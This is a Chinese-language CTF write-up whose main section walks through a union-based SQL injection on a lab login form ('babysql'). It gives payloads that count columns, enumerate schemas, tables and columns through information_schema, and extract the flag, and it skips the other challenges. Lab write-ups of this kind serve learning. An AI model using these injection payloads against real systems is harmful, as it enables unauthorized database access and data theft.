Web

Dark

暗網，正常比賽不出，跳

Welcome2021

F12 Network 刷新，現在進不去了不知道咋寫

babysql

以前沒接觸過sql注入，所以從頭學。
sql基本語法：https://kodosan.com/359.html

聯合查詢注入的原理就是在語句select … from … where …=uname中先用隨便什么值加個引號（因為uname用戶名正常情況下是字符串）把前邊的語句結束了（如’-1’），然后在后面接上一堆自己想用的sql查詢命令。但sql查個東西都得指定是哪個數據庫哪個表哪列（列倒是能直接用*），我咋知道有啥數據庫有啥表。不過MySQL他有一個叫information_schema的數據庫，里邊把數據庫名表名列名（或許應該叫字段？）都寫出來的。所以開始就用這個語句查一下都有啥數據庫:

SELECT schema_name from information_schema.SCHEMATA

然而這是個聯合注入，不是直接查詢，所以得打開harkbar，先亂輸點啥用戶名和密碼提交，然后loadurl看看鏈接里有沒有uname和pwd。要沒有那就是post發的，打開post data再點loadurl就有了。之后我們就可以在uname=后邊輸上聯合查詢形式的上邊的語句。別忘了把后邊的引號注釋掉要加#或者-- -或者-- +

uname=-1' UNION SELECT schema_name from information_schema.SCHEMATA#&pwd=1

然后你就傻了，因為他報錯了。

為啥捏，因為這個聯合查詢吧他要求你前邊查幾列后邊就得查幾列。我前邊就是啥都沒查到你也得跟著我幾列就是幾列。那沒招，一列一列的加。你會發現加到第四列就不報錯了。

uname=-1' UNION SELECT schema_name,2 from information_schema.SCHEMATA#&pwd=1 uname=-1' UNION SELECT schema_name,2,3 from information_schema.SCHEMATA#&pwd=1 uname=-1' UNION SELECT schema_name,2,3,4 from information_schema.SCHEMATA#&pwd=1

彈出的窗口上顯示

your uname:information_schema and your pwd:2

然后你又傻了。

為啥捏，因為你就查到了一個information_schema，這不擱著擱著呢嗎？

其實真正原因是，他就給你顯示了一行。那咋辦捏，不急，我們可以用group_concat把這列所有行擠到第一行里去.

uname=-1' UNION SELECT group_concat(schema_name),2,3,4 from information_schema.SCHEMATA#&pwd=1 uname:information_schema,performance_schema,test,mysql,flag,babysql and your pwd:2

然后我們就能看到一個叫flag的數據庫，那就繼續到information_schema.tables里去找flag數據庫里有哪些表。

uname=-1' union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema='flag'#&pwd=1 your uname:fllag and your pwd:2

這里table_schema是tables里的一個字段，表示這行的表是哪個數據庫的。

繼續查

uname=-1' union select group_concat(column_name),2,3,4 from information_schema.columns where table_schema='flag' and table_name='fllag'#&pwd=1

顯示

your uname:fllllllag,wlz and your pwd:2

那現在數據庫名表名列名都知道了，直接查fllllllag里看看有啥

uname= -1' union select group_concat(fllllllag),2,3,4 from flag.fllag#&pwd=1

顯示

your uname:SYC{U_4N0vv_Sql_Noyv~} and your pwd:2

babyPOP

總結

以上是生活随笔為你收集整理的Geek 学习的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。